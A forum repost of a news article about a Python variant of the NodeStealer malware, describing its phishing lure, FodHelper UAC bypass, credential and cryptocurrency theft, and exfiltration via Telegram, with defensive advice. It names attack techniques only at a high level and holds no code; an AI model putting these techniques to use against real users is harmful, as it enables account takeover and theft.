Official forum for Utopia Community

You are not logged in.

#1 2023-08-02 23:56:36

Registered: 2023-01-04
Posts: 1,974

Targeting Bitcoin Wallets and Facebook Business Accounts: New NodeStea

The stealer malware NodeStealer has a Python variant that can completely take over Facebook business accounts and siphon cryptocurrency, according to cybersecurity researchers.

As part of a campaign that started in December 2022, Palo Alto Network Unit 42 claimed to have discovered the previously unidentified strain.

NodeStealer was first identified by Meta in May 2023, who described it as a stealer that could compromise Facebook, Gmail, and Outlook accounts by gathering cookies and passwords from web browsers. The most recent samples were created in Python as opposed to the earlier ones, which were created in JavaScript.

According to Unit 42 researcher Lior Rochberger, "NodeStealer poses great risk for both individuals and organizations.". In addition to having a direct financial impact on Facebook business accounts, the malware also steals browser login information that can be used in future attacks. ".

The attacks begin with fake Facebook messages that allegedly offer free "professional" budget tracking Microsoft Excel and Google Sheets templates, tricking victims into downloading a ZIP archive file hosted on Google Drive.

The stealer executable is embedded in the ZIP file and is intended to download additional malware like BitRAT and XWorm as ZIP files, disable Microsoft Defender Antivirus, and steal cryptocurrency using MetaMask credentials from the Google Chrome, Cc Cc, and Brave web browsers, in addition to capturing Facebook business account information.

The downloads are carried out using a User Account Control (UAC) bypass method that makes use of the fodhelper. exe to run PowerShell scripts that download ZIP files from a distant server.

It's important to note that the threat actors behind the Casbaneiro banking malware have also used the FodHelper UAC bypass technique to gain elevated privileges on infected hosts.

The upgraded Python version of NodeStealer, according to Unit 42, goes beyond credential and cryptocurrency theft by implementing anti-analysis features, parsing emails from Microsoft Outlook, and even attempting to hijack the associated Facebook account.

The files are exfiltrated through the Telegram API after the necessary data has been gathered, and then they are removed from the computer to remove the trail.

NodeStealer is another piece of malware that joins the likes of Ducktail in the growing trend of Vietnamese threat actors trying to hack Facebook business accounts in order to commit advertising fraud and spread malware to other users of the social media platform.


As part of a multi-stage phishing attack, threat actors have been seen using WebDAV servers to deploy BATLOADER, which is then used to disseminate XWorm.

Rochberger advised Facebook business account owners to enable multi-factor authentication and use strong passwords. "Spend the time to educate your company on phishing techniques, particularly modern, targeted strategies that capitalize on business requirements, current events, and other alluring topics. ".


Board footer

Powered by FluxBB